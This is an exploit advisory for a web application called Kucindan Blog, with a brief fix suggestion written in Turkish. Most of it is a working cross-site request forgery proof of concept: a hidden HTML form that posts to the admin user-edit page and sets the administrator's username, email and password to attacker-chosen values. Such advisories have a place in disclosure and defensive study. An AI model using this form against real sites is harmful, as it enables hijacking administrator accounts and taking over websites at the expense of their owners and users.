< ------------------- header data start ------------------- >

#############################################################

# Application Name : Kucindan Blog

# vulnerable Type : XSRF

# author : _iLLeqaL_

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form method=POST action=http://[site].com/[yol]/adm/edit.user.php enctype=multipart/form-data>
<input type=hidden name=username id=username value=admin />
<input type=hidden name=nm id=nm value=admin/>
<input type=hidden name=email id=email value=[email protected] />
<input type=hidden name=password id=password value=123456/>
<input type=hidden name=repass id=repass value=123456/>
<input type=submit name=save value= O K />
<input type=hidden name=oldus value=admin />
</form>

< -- bug code end of -- >